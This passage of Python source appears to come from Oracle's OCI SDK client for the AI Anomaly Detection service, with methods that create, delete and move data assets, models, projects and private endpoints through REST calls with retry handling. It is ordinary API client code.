Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_data_asset_compartment.py.html>`__ to see an example of how to use change_data_asset_compartment API.
"""
resource_path = "/dataAssets/{dataAssetId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_data_asset_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
def change_model_compartment(self, model_id, change_model_compartment_details, **kwargs):
"""
Moves a Model resource from one compartment to another. When provided, If-Match is checked against ETag values of the resource.
:param str model_id: (required)
The OCID of the Model.
:param oci.ai_anomaly_detection.models.ChangeModelCompartmentDetails change_model_compartment_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_model_compartment.py.html>`__ to see an example of how to use change_model_compartment API.
"""
resource_path = "/models/{modelId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_model_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
def change_project_compartment(self, project_id, change_project_compartment_details, **kwargs):
"""
Moves a Project resource from one compartment to another. When provided, If-Match is checked against ETag values of the resource.
:param str project_id: (required)
The OCID of the Project.
:param oci.ai_anomaly_detection.models.ChangeProjectCompartmentDetails change_project_compartment_details: (required)
The details to change the compartment of the project.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_project_compartment.py.html>`__ to see an example of how to use change_project_compartment API.
"""
resource_path = "/projects/{projectId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_project_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
def create_ai_private_endpoint(self, create_ai_private_endpoint_details, **kwargs):
"""
Create a new private reverse connection endpoint.
:param oci.ai_anomaly_detection.models.CreateAiPrivateEndpointDetails create_ai_private_endpoint_details: (required)
The information used to create the private reverse connection.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_ai_private_endpoint.py.html>`__ to see an example of how to use create_ai_private_endpoint API.
"""
resource_path = "/aiPrivateEndpoints"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_ai_private_endpoint_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_ai_private_endpoint_details)
def create_data_asset(self, create_data_asset_details, **kwargs):
    """
    Creates a new DataAsset.

    :param oci.ai_anomaly_detection.models.CreateDataAssetDetails create_data_asset_details: (required)
        Details for the new DataAsset.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies the request so that it can be safely
        retried after a timeout or server error without re-executing the
        action. Tokens expire after 24 hours but may be invalidated earlier
        by conflicting operations.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_data_asset.py.html>`__ to see an example of how to use create_data_asset API.
    """
    resource_path = "/dataAssets"
    method = "POST"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "opc_retry_token", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_data_asset got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=header_params,
            body=create_data_asset_details,
            response_type="DataAsset")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retries: make the POST idempotent and advertise client retries.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_data_asset_details,
        response_type="DataAsset")
def create_model(self, create_model_details, **kwargs):
    """
    Creates a new Model.

    :param oci.ai_anomaly_detection.models.CreateModelDetails create_model_details: (required)
        Details for the new Model.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies the request so that it can be safely
        retried after a timeout or server error without re-executing the
        action. Tokens expire after 24 hours but may be invalidated earlier
        by conflicting operations.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Model`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_model.py.html>`__ to see an example of how to use create_model API.
    """
    resource_path = "/models"
    method = "POST"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "opc_retry_token", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_model got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=header_params,
            body=create_model_details,
            response_type="Model")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retries: make the POST idempotent and advertise client retries.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_model_details,
        response_type="Model")
def create_project(self, create_project_details, **kwargs):
    """
    Creates a new Project.

    :param oci.ai_anomaly_detection.models.CreateProjectDetails create_project_details: (required)
        Details for the new Project.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies the request so that it can be safely
        retried after a timeout or server error without re-executing the
        action. Tokens expire after 24 hours but may be invalidated earlier
        by conflicting operations.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Project`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_project.py.html>`__ to see an example of how to use create_project API.
    """
    resource_path = "/projects"
    method = "POST"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "opc_retry_token", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_project got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=header_params,
            body=create_project_details,
            response_type="Project")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retries: make the POST idempotent and advertise client retries.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_project_details,
        response_type="Project")
def delete_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
    """
    Deletes a private reverse connection endpoint by identifier.

    :param str ai_private_endpoint_id: (required)
        Unique private reverse connection identifier.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag returned by a
        previous GET or POST for this resource. The delete is performed only
        when the supplied value matches the resource's current etag.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_ai_private_endpoint.py.html>`__ to see an example of how to use delete_ai_private_endpoint API.
    """
    resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_ai_private_endpoint got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "aiPrivateEndpointId": ai_private_endpoint_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    # Path parameters may never be None, empty, or whitespace-only.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)
def delete_data_asset(self, data_asset_id, **kwargs):
    """
    Deletes a DataAsset resource by identifier

    :param str data_asset_id: (required)
        The OCID of the Data Asset.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag returned by a
        previous GET or POST for this resource. The delete is performed only
        when the supplied value matches the resource's current etag.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_data_asset.py.html>`__ to see an example of how to use delete_data_asset API.
    """
    resource_path = "/dataAssets/{dataAssetId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_data_asset got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "dataAssetId": data_asset_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    # Path parameters may never be None, empty, or whitespace-only.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)
def delete_model(self, model_id, **kwargs):
    """
    Deletes an ai model resource by identifier. This operation fails with a
    409 error unless all associated resources are in a DELETED state. You
    must delete all associated resources before deleting a project.

    :param str model_id: (required)
        The OCID of the Model.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag returned by a
        previous GET or POST for this resource. The delete is performed only
        when the supplied value matches the resource's current etag.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_model.py.html>`__ to see an example of how to use delete_model API.
    """
    resource_path = "/models/{modelId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_model got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "modelId": model_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    # Path parameters may never be None, empty, or whitespace-only.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)
def delete_project(self, project_id, **kwargs):
    """
    Deletes a Project resource by identifier. This operation fails with a
    409 error unless all associated resources (models deployments or data
    assets) are in a DELETED state. You must delete all associated resources
    before deleting a project.

    :param str project_id: (required)
        The OCID of the Project.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag returned by a
        previous GET or POST for this resource. The delete is performed only
        when the supplied value matches the resource's current etag.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/delete_project.py.html>`__ to see an example of how to use delete_project API.
    """
    resource_path = "/projects/{projectId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not support.
    allowed_kwargs = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "delete_project got unknown kwargs: {!r}".format(unknown))

    path_params = {
        "projectId": project_id
    }
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}

    # Path parameters may never be None, empty, or whitespace-only.
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Strip headers the caller did not supply.
    header_params = {
        name: value for (name, value) in six.iteritems(header_params)
        if value is not missing and value is not None
    }

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No strategy configured anywhere: issue a single, plain call.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params)
def detect_anomalies(self, detect_anomalies_details, **kwargs):
    """
    Make a detect call with an anomaly model and detection data

    :param oci.ai_anomaly_detection.models.DetectAnomaliesDetails detect_anomalies_details: (required)
        The input is either:
        - a JSON object in the request (the SDK generates this object), or
        - data embedded as a base64 string in CSV or JSON format. With this
          option the caller supplies the CSV/JSON content base64-encoded;
          embedded JSON must follow the same format as the inline request
          JSON.

    :param str opc_request_id: (optional)
        The client request ID for tracing.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag returned by a
        previous GET or POST for this resource. The call proceeds only when
        the supplied value matches the resource's current etag.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies the request so that it can be safely
        retried after a timeout or server error without re-executing the
        action. Tokens expire after 24 hours but may be invalidated earlier
        by conflicting operations.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any strategy set
        at the client level. Must be one of the strategies in the
        :py:mod:`~oci.retry` module. The operation does not retry by
        default; pass :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` to enable
        retries, or an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable them.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.AnomalyDetectResult`
    :rtype: :class:`~oci.response.Response`

    :example:
